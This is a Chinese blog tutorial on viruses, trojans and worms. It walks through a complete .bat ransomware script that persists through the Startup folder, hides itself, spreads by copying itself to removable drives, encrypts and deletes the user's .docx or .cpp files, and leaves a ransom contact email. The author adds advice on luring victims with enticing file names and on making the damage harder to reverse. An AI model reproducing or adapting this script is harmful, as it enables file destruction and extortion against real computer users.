病毒、木马、蠕虫与恶意代码关键点
病毒:寄生存在,所谓寄生,就是病毒的指令存在于其它可执行程序的空指令部分。如下图为一个标准的计寄生形式的病毒:
运行可执行程序,一个jmp指令会导致程序跳转到病毒所在指令处开始执行,执行完毕之后跳转回正常代码区开始执行可执行程序。
木马:独立存在,一般具有潜伏期(一般是.exe、.com、.pif、.scr等为后缀的文件)
蠕虫:强制传染性,常利用主机的漏洞在网络中传播。如下为一个蠕虫的基本结构:
蠕虫其重要的一个特点就是存在扫描模块与感染模块。
由于早期的DOS系统,其系统占用内存小,且文件数目少,所以寄生形式的病毒比较多,因为木马是一个独立的文件,如果系统文件本身就比较少,随便多出一个文件就可能会被发现,所以破坏性的代码基本都以寄生形式的病毒出现。而木马一般都有潜伏期,就像特洛伊木马潜伏在城内,在特定的时间才进行攻击或者非攻击的其它操作。如今似乎这三者的区分已经不那么明显,我们一般统称为病毒。
一般恶意代码的几个关键点:
①如何隐蔽自己:代码精炼、文件寄生、进程隐藏
②如何激活自己:木马型:开机自启、登录、定时、自动运行等;寄生型:和宿主一块启动。
③如何传染别人:网络共享、感染U盘、发送邮件、发送聊天附件、扫描主机漏洞。
④如何达到目的:键盘记录(获取网络登录信息等)、传走文件/删除文件/加密文件(进行勒索)、控制主机(如僵尸网络等)
以一个.bat脚本来说明一个简单的破坏性代码的形式:
copy %0 "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy encrypt.exe "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
attrib +h %0
attrib +h encrypt.exe
copy %0 d:\
copy %0 e:\
copy %0 f:\
copy %0 g:\
copy %0 h:\
copy %0 i:\c:
for /r . %%i in (*.docx) do (encrypt.exe e passwd %%i %%i.cpp要解密联系mailbox_krj@163.comdel %%i
)如何激活?用将脚本名改为”美女”/”系统一键修复”等具有诱惑性的名称,(当然把一个脚本名命名为诱惑性的名称,似乎上当的概率不太大,对于一个稍微有点常识的人来说,但是.exe可执行文件就不一定了)。当你双击运行脚本,copy %0 “%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”就会将该文件拷贝到系统开机自启动目录下。那么以后就不需要诱惑性激活,而可以自行激活。
%0是执行的带路径文件名
%USERPROFILE%是当前用户
**如何隐藏?**attrib +h %0命令将执行的文件隐藏起来。+h(hide)表示为文件增加hide(隐藏)属性。
如何传染别人?
copy %0 d:\
copy %0 e:\
copy %0 f:\
copy %0 g:\
copy %0 h:\
copy %0 i:\如果d盘到i盘(一般U盘基本不会超过这个范围,当然你也可以多写几个拷贝命令一直拷贝到z:盘)中有一个是U盘或可以移动的存储介质,那么当该脚本执行时就会将自己复制到U盘上去,在别人使用该U盘时,被诱惑性的文件名所欺骗激活病毒,该病毒就传播感染到其它计算机上去了。
如何达到目的? 目的有好有坏,如果是脚本中所写:
c:
for /r . %%i in (*.cpp) do (encrypt.exe e 123456 %%i %%i.cpp要解密联系mailbox_krj@163.comdel %%i
)注:encrypt.exe是自己写的一个简单的加密算法,e为命令行参数表示加密,123456为密钥。encrypt.exe将所有.cpp文件加密并修改文件名。达到勒索的目的。(当然该.bat勒索病毒需要一个encrypt.exe加密程序,当然加密程序与.bat脚本都可以合并到一个C/C++写的恶意代码中去)。关于加密程序可简单参考: TEA加密算法
其实del %%i做的并不是特别干净,因为删除的文件还有可能再找回来。如果完全用垃圾数据覆盖磁盘,或者直接在原件上加密而不是在副本上加密而删除原件,其恶意性更为突出。
病毒、木马、蠕虫与恶意代码关键点相关推荐
- 一个可恶的javascript病毒/木马解码之后的代码
中毒的话,整个网络都会受影响,表现为所有的IE浏览器打开的网页都会在前面加一个 javascript 的连接.清除比较麻烦.显示的这段是这个链接后面的代码: var vDA1 = new window ...
- 信息安全与技术——(十一)恶意代码检测与防范技术
文章目录 1.恶意代码(Malicious Code) 2.恶意代码对系统带来的影响 3.典型病毒 3.1蠕虫病毒 3.2熊猫烧香病毒 3.3木马病毒 3.4DDoS攻击木马 3.5邮箱病毒 4.恶意 ...
- 计算机病毒与恶意代码防范技术
一,计算机病毒概述 计算机病毒是一段可执行的程序代码,它们附着在各种类型的文件上,随着文件从一个用户复制给另一个用户时,从而蔓延传播. 1,计算机病毒定义 我国法律对病毒的定义: 计算机病毒是指编制或 ...
- 网安--第七章 恶意代码分析与防治
第7章 恶意代码分析与防治 内容提要 ◎ 恶意代码的发展史和恶意代码长期存在的原因 ◎ 恶意代码实现机理.定义以及攻击方法 ◎ 恶意代码生存技术.隐藏技术,介绍网络蠕虫的定义以及结构 ◎ 恶意代码防范 ...
- 安全防御 --- 恶意代码、防病毒
一.恶意代码 1.按照传播方式分类 (1)病毒 概念: 病毒是一种基于硬件和操作系统的程序,具有感染和破坏能力,这与病毒程序的结构有关.病毒攻击的宿主程序是病毒的栖身地,它是病毒传播的目的地,又是下一 ...
- 病毒木马防御与分析实战
<病毒木马防御与分析>系列以真实的病毒木马(或恶意程序)为研究对象,通过现有的技术手段对其分析,总结出它的恶意行为,进而制定出相应的应对方法,对其彻底查杀.当然,因为我个人水平的有限,查杀 ...
- 20145217《网络对抗》 恶意代码分析
20145217<网络对抗> 免杀原理与实践 知识点学习总结 进行恶意代码分析之前必须具备以下知识:编程.汇编/反汇编.网络基本知识.PE文件结构以及一些常用行为分析软件. 一.在一个已经 ...
- MS08067 第一期 “恶意代码分析”实战班 正式开班~
文章来源|MS08067安全实验室 恶意代码分析实战班 恶意代码分析的分类: 恶意代码分析也可作为单独的安全专业类别来看待,不过总体是偏逆向方向的,希望的受众是逆向相关的就行了,比如以前只会逆向但是不 ...
- 病毒木马查杀实战第001篇:基本查杀理论与实验环境配置
前言 <病毒木马查杀>系列以真实的病毒木马(或统称为恶意程序)为研究对象,通过现有的技术手段对其分析,总结出它的恶意行为,进而制定出相应的应对方法(如编写专杀工具),对其彻底查杀.当然,本 ...
最新文章
- Nginx rewrite正则匹配重写
- Xamarin环境搭建
- mysql userstat_mysql 中记录用户登录错误日志方法小结
- 回滚到公共回购中的旧Git提交
- 零基础学python看什么书-转行零基础该如何学习python?很庆幸,三年前的我选对了...
- 改善OpenStack上DHCP的性能 【已翻译100%】
- python修改html的td_python3修改HTMLTestRunner,生成有截图的测试报告,并发送测试邮件(一)...
- 图文|Android 使用Thread 和多线程使用互斥锁
- (DFS or BFS)Find The Multiple(poj1426)
- 零基础入门深度学习(7) - 递归神经网络
- Laravel 指定日志生成目录
- HTML标签(持续更新)
- 国际化标签 fmt:bundlefmt:message的使用
- MySQL中 char和varchar的区别
- webassembly环境搭建、编译h265解码器、js调用
- d2j-dex2jar classes.dex报错
- Embarcadero® Delphi 10.3源码安装fastreport6
- 正态分布是离散分布还是连续分布_正态分布,谁与争峰
- Hikari数据库连接池泄露问题排查
- 海致大数据京信_2018华为全联接大会|海致网聚提出公安大数据个人计算新理念...